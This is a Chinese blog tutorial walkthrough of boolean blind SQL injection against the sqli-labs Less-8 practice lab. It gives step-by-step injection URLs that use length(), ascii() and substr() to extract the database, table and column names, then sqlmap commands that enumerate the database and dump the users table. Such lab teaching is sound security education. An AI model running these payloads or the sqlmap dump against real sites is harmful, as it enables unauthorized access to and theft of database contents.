sql盲注

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

前言

靶场环境:sqli-labs-master 第8关
注入攻击的本质:把用户的输入当作代码执行。
其中存在两个关键条件:
(1)用户可以控制输入。
(2)用户的输入被拼接到原代码上被执行。


提示:以下是本篇文章正文内容,下面案例可供参考

一、什么是盲注

所谓盲注便是在服务器没有错误回显的时候完成的注入攻击。sql盲注主要分为三类,分别是布尔盲注、延时盲注(也叫时间盲注)、报错盲注。

二、步骤示例

1.测试注入点


http://192.168.159.130/sqli-labs-master/Less-8/?id=1' and 1=2 --+
#id 处存在注入点

2.测所在数据库长度

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (length(database()))=8 --+

3. 利用ASCII码猜当前数据库名

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr(database(),1,1)))=115 --+

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr(database(),2,1)))=101 --+

以此类推,可以通过ASCII码所对应的值得到数据库名。

4.利用ASCII码查询表名

具体查询过程跟查数据库名基本一样

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101 --+

过程跟上述命令类似,只是有少许不同,相关的一些命令会在后面给出

5、利用ASCII码查询字段名

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)))=105 --+

sql手注所用到的函数总结

length() #返回字符串的长度
substr() #截取字符串 (语法:substr(str,pos,len);ascii()  #反回字符的ascii码

如上所述,利用手注进行盲注非常麻烦,因此我们可以利用工具进行sql注入

sqlmap进行sql盲注

1.寻找注入点,

sqlmap -u  192.168.159.130/sqli-labs-master/Less-8/?id=1

请添加图片描述
由图中可以看出,sql注入类型为bool盲注
2、查库名

sqlmap -u 192.168.159.130/sqli-labs-master/Less-8/?id=1 --current-db

请添加图片描述
3、查表名

sqlmap -u 192.168.159.130/sqli-labs-master/Less-8/?id=1 -D security --tables

请添加图片描述
4、查字段名

sqlmap -u 192.168.159.130/sqli-labs-master/Less-8/?id=1 -D security -T users --dump

请添加图片描述

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DVWA(Damn Vulnerable Web Application)是一个用于练习 Web 安全技术的漏洞应用程序。其中包含了多个不同类型的漏洞,包括 SQL 盲注SQL 盲注是一种利用 Web 应用程序中存在的 SQL 注入漏洞来获取数据库信息的攻击技术。在 DVWA 中,你可以通过以下步骤进行 SQL 盲注的高级练习: 1. 登录 DVWA:在浏览器中访问 DVWA,并使用提供的用户名和密码登录。 2. 寻找 SQL 注入点:在 DVWA 中,你需要找到存在 SQL 注入漏洞的输入点。这可以是登录表单、搜索框或其他用户输入的地方。 3. 确定数据库和表名:使用不正确的输入来尝试触发错误,并尝试从错误消息中获取有关数据库和表名的信息。这可以帮助你构建有效的注入语句。 4. 构造注入语句:根据你获取到的数据库和表名信息,构造有效的注入语句。在高级盲注中,你可能需要使用一些技巧来绕过过滤和限制。 5. 判断注入结果:通过观察应用程序的响应,判断你的注入语句是否成功执行。你可以观察页面内容、错误消息或应用程序的行为变化。 6. 提取数据:如果注入成功执行,你可以使用 UNION SELECT 或其他技术来提取数据库中的数据。通过逐渐调整注入语句,你可以获取更多敏感信息。 请注意,在进行 DVWA 或任何其他漏洞练习时,遵守法律和道德规范。仅在授权的环境中进行测试,不要攻击未经授权的系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃泡面不喝汤

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值